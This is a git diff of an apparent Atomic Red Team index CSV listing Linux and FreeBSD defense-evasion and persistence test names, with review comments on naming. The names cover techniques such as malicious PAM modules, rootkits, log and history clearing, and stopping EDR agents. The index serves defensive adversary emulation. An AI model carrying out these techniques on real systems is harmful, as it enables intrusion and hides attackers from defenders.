Merge branch 'master' into master
@@ -16,7 +16,7 @@
# Atomic Red Team
File diff suppressed because one or more lines are too long
@@ -1,5 +1,6 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh
defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,sh
@@ -10,33 +11,54 @@ defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD,
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",10,chflags - Remove immutable file attribute,60eee3ea-2ebd-453b-a666-c52ce08d2709,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",11,Chmod through c script,973631cf-6680-4ffa-a053-045e1b6b67ab,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",12,Chmod through c script (freebsd),da40b5fe-3098-4b3b-a410-ff177e49ee2e,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",13,Chown through c script,18592ba1-5f88-4e3c-abc8-ab1c6042e389,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",14,Chown through c script (freebsd),eb577a19-b730-4918-9b03-c5edcf51dc4e,sh
defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh
defense-evasion,T1014,Rootkit,4,Loadable Kernel Module based Rootkit (Diamorphine),0b996469-48c6-46e2-8155-a17f8b6c2247,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Sudo usage (freebsd),2bf9a018-4664-438a-b435-cc6f8c6f71b1,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,4,Unlimited sudo cache timeout (freebsd),a83ad6e8-6f24-4d7f-8f44-75f8ab742991,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,5,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,6,Disable tty_tickets for sudo caching (freebsd),4df6a0fe-2bdd-4be8-8618-a6a19654a57a,sh
defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (FreeBSD),e129d73b-3e03-4ae9-bf1e-67fc8921e0fd,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",2,rm -rf,bd8ccc45-d632-481e-b7cf-c467627d68f9,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",5,Truncate system log files via truncate utility (freebsd),14033063-ee04-4eaf-8f5d-ba07ca7a097c,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",7,Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd),369878c6-fb04-48d6-8fc2-da9d97b3e054,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",10,Overwrite FreeBSD system log via echo utility,11cb8ee1-97fb-4960-8587-69b8388ee9d9,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",13,Delete system log files via unlink utility (freebsd),45ad4abd-19bd-4c5f-a687-41f3eee8d8c2,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",18,Delete system journal logs via rm and journalctl utilities,ca50dd85-81ff-48ca-92e1-61f119cb1dcf,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",19,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",20,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,2,Clear sh history (rm),448893f8-1d5d-4ae2-9017-7fcd73a7e100,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear sh history (echo),a4d63cb3-9ed9-4837-9480-5bf6b09a6c96,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,5,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear sh history (cat dev/null),ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Clear sh history (ln dev/null),3126aa7a-8768-456f-ae05-6ab2d4accfdd,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,9,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,10,Clear sh history (truncate),e14d9bb0-c853-4503-aa89-739d5c0a5818,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,12,Clear history of a bunch of shells (freebsd),9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,13,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,14,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,15,Disable Bash History Logging with SSH -T,5f8abd62-f615-43c5-b6be-f780f25790a1,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,16,Disable sh History Logging with SSH -T (freebsd),ec3f2306-dd19-4c4b-bed7-92d20e9b1dee,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding with Python,356dc0e8-684f-4428-bb94-9313998ad608,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Base64 decoding with shell utilities (freebsd),b6097712-c42e-4174-b8f2-4b1e1a5bbb3d,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,7,FreeBSD b64encode Shebang in CLI,18ee2002-66e8-4518-87c5-c0ec9c8299ac,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,8,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,9,Linux Base64 Encoded Shebang in CLI,3a15c372-67c1-4430-ac8e-ec06d641ce4d,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,10,XOR decoding and command execution using Python,c3b65cd5-ee51-4e98-b6a3-6cbdec138efc,bash
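Review bot: two pairs of rows in this hunk give different tests the identical Test Name, so anyone filtering the index by name cannot tell them apart: T1014 tests 1 and 2 are both "Loadable Kernel Module based Rootkit" (GUIDs dfb50072-e45a-4c75-a17e-a484809c8553 and 75483ef8-f10f-444a-bf02-62eb0e48db6f), and T1070.002 tests 1 and 2 are both "rm -rf" (989cc1b1-3642-4260-a809-54f9dd559683 and bd8ccc45-d632-481e-b7cf-c467627d68f9). Test 4 already shows the pattern to follow, "Loadable Kernel Module based Rootkit (Diamorphine)"; give tests 1 and 2 a qualifier of the same kind, and name what each "rm -rf" test removes rather than the command it uses. Separately, T1222.002 test 7 "chown - Change file or folder mode ownership only" reads like a copy-and-paste remnant of the chmod rows above it; "chown - Change file or folder ownership only" matches the phrasing of test 8.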
@@ -49,9 +71,11 @@ defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,2,Set a file's mo
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,7,Stop/Start UFW firewall,fe135572-edcd-49a2-afe6-1d39521c5a9a,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,8,Stop/Start Packet Filter,0ca82ed1-0a94-4774-9a9a-a2c83a8022b7,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,9,Stop/Start UFW firewall systemctl,9fd99609-1854-4f3c-b47b-97d9a5972bd1,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,10,Turn off UFW logging,8a95b832-2c2a-494d-9cb0-dc9dd97c8bad,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,11,Add and delete UFW firewall rules,b2563a4e-c4b8-429c-8d47-d5bcb227ba7a,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,12,Add and delete Packet Filter rules,8b23cae1-66c1-41c5-b79d-e095b6098b5b,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,13,Edit UFW firewall user.rules file,beaf815a-c883-4194-97e9-fdbbb2bbdd7c,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,14,Edit UFW firewall ufw.conf file,c1d8c4eb-88da-4927-ae97-c7c25893803b,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,15,Edit UFW firewall sysctl.conf file,c4ae0701-88d3-4cd8-8bce-4801ed9f97e4,sh
@@ -64,23 +88,32 @@ defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,2,Pad
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Make and modify binary from C source (freebsd),dd580455-d84b-481b-b8b0-ac96f3b1dc4c,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Set a SetUID flag on file (freebsd),9be9b827-ff47-4e1b-bef8-217db6fb7283,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,6,Set a SetGID flag on file (freebsd),1f73af33-62a8-4bf1-bd10-3bea931f2c0d,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,7,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,8,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,9,Do reconnaissance for files that have the setuid bit set,8e36da01-cd29-45fd-be72-8a0fcaad4481,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,10,Do reconnaissance for files that have the setgid bit set,3fb46e17-f337-4c14-9f9a-a471946533e2,sh
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,2,Auditing Configuration Changes on FreeBSD Host,cedaf7e7-28ee-42ab-ba13-456abd35d1bd,sh
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,3,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,4,Logging Configuration Changes on FreeBSD Host,6b8ca3ab-5980-4321-80c3-bcd77c8daed8,sh
defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,3,linux rename /proc/pid/comm using prctl,f0e3aaea-5cd9-4db6-a077-631dd19b27a8,sh
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,2,Disable history collection (freebsd),cada55b4-8251-4c60-819e-8ec1b33c9306,sh
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,3,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,4,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,5,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,6,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,7,Setting the HISTSIZE environment variable,386d3850-2ce7-4508-b56b-c0558922c814,sh
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,8,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,9,Setting the HISTFILE environment variable (freebsd),f7308845-6da8-468e-99f2-4271f2f5bb67,sh
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,10,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,2,Disable syslog (freebsd),db9de996-441e-4ae0-947b-61b6871e2fdf,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,3,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,4,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,5,Stop Crowdstrike Falcon on Linux,828a1278-81cc-4802-96ab-188bf29ca77d,sh
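Review bot: T1562.003 test 4 "Clear bash history" (878794f7-c511-4199-a950-8c28b3ed8e5b) duplicates the intent of the T1070.003 "Clear Command History" rows in the previous hunk ("Clear Bash history (rm)", "Clear Bash history (echo)", "Clear Bash history (truncate)"), and its name gives no hint of what makes it a HISTCONTROL test; either state the distinguishing mechanism in the Test Name or move the row under T1070.003. Also, T1562.003 test 3 "Mac HISTCONTROL" with executor "manual" is the only row in the visible diff whose name targets macOS alone, while every neighbouring row is a Linux or FreeBSD sh/bash test; confirm it belongs in this index.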
@@ -91,8 +124,10 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,42,Clear Pagg
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,43,Disable Memory Swap,e74e4c63-6fde-4ad2-9ee8-21c3a1733114,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,47,Tamper with Defender ATP on Linux/MacOS,40074085-dbc8-492b-90a3-11bcfc52fda8,sh
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
defense-evasion,T1027,Obfuscated Files or Information,2,Decode base64 Data into Script,197ed693-08e6-4958-bfd8-5974e291be6c,sh
defense-evasion,T1036.003,Masquerading: Rename System Utilities,2,Masquerading as FreeBSD or Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,2,Install root CA on FreeBSD,f4568003-1438-44ab-a234-b3252ea7e7a3,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,3,Install root CA on Debian/Ubuntu,53bcf8a0-1549-4b85-b919-010c56d724ff,sh
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,3,C compile,d0377aa6-850a-42b2-95f0-de558d80be57,sh
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,4,CC compile,da97bb11-d6d0-4fc1-b445-e443d1346efe,sh
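Review bot: T1027 tests 1 and 2 are both named "Decode base64 Data into Script" (f45df6be-2e1e-4136-a384-8f18ab3826fb and 197ed693-08e6-4958-bfd8-5974e291be6c), so the two rows are indistinguishable by Test Name; add a qualifier, as the rest of the index does with "(freebsd)". Minor: T1036.003 test 2 "Masquerading as FreeBSD or Linux crond process." ends with a period, which no other Test Name in this hunk does.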
@@ -101,27 +136,38 @@ defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,1,Delete a si
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,2,Delete an entire folder - FreeBSD/Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,9,Delete Filesystem - FreeBSD,b5aaca7e-a48f-4f1b-8f0f-a27b8f516608,sh
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,2,"Binary packed by UPX, with modified headers (linux)",f06197f8-ff46-48c2-a0c6-afc1b50665e1,sh
defense-evasion,T1036.006,Masquerading: Space after Filename,2,Space After Filename,b95ce2eb-a093-4cd8-938d-5258cef656ea,bash
defense-evasion,T1036.006,Masquerading: Space after Filename,3,Space After Filename (FreeBSD),cfc1fbb5-caae-4f4c-bfa8-1b7c8b5cc4e8,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
defense-evasion,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
defense-evasion,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
defense-evasion,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh
persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
persistence,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
persistence,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
persistence,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /etc/cron.d folder,078e69eb-d9fb-450e-b9d0-2e118217c846,sh
persistence,T1053.003,Scheduled Task/Job: Cron,4,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
persistence,T1176,Browser Extensions,1,Chrome/Chromium (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome/Chromium (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
persistence,T1546.005,Event Triggered Execution: Trap,2,Trap EXIT (freebsd),be1a5d70-6865-44aa-ab50-42244c9fd16f,sh
persistence,T1546.005,Event Triggered Execution: Trap,3,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
persistence,T1546.005,Event Triggered Execution: Trap,4,Trap SIGINT (freebsd),ade10242-1eac-43df-8412-be0d4c704ada,sh
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
persistence,T1136.001,Create Account: Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash
persistence,T1136.001,Create Account: Local Account,2,Create a user account on a FreeBSD system,a39ee1bc-b8c1-4331-8e5f-1859eb408518,sh
persistence,T1136.001,Create Account: Local Account,6,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash
persistence,T1136.001,Create Account: Local Account,7,Create a new user in FreeBSD with `root` GID.,d141afeb-d2bc-4934-8dd5-b7dba0f9f67a,sh
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,sh
persistence,T1136.002,Create Account: Domain Account,4,Active Directory Create Admin Account,562aa072-524e-459a-ba2b-91f1afccf5ab,sh
persistence,T1136.002,Create Account: Domain Account,5,Active Directory Create User Account (Non-elevated),8c992cb3-a46e-4fd5-b005-b1bab185af31,sh
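Review bot: the platform qualifier is capitalised inconsistently within this hunk, which breaks case-sensitive filtering on Test Name: T1078.003 tests 9 and 11 use "(FreeBSD)" while test 13 "Login as nobody (freebsd)" and T1556.003 test 2 "Malicious PAM rule (freebsd)" use lowercase; pick one form (the T1222.002 and T1548.003 rows earlier in the file use lowercase). T1136.001 tests 6 and 7 also carry backticks and a trailing period ("Create a new user in Linux with `root` UID and GID.") that no other row in the index uses; normalise these before the CSV is consumed by tooling.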
@@ -131,20 +177,29 @@ persistence,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level t
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,3,Add command to .shrc,41502021-591a-4649-8b6e-83c9192aff53,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,4,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,5,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,6,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,7,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,4,rc.local (FreeBSD),2015fb48-8ab6-4fbf-928b-0b62de5c9476,sh
persistence,T1543.002,Create or Modify System Process: SysV/Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
persistence,T1543.002,Create or Modify System Process: SysV/Systemd Service,2,Create SysV Service,760fe8d2-79d9-494f-905e-a239a3df86f6,sh
persistence,T1543.002,Create or Modify System Process: SysV/Systemd Service,3,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
persistence,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
persistence,T1053.002,Scheduled Task/Job: At,3,At - Schedule a job freebsd,549863fb-1c91-467e-97fc-1fa32b9f356b,sh
persistence,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
persistence,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
persistence,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
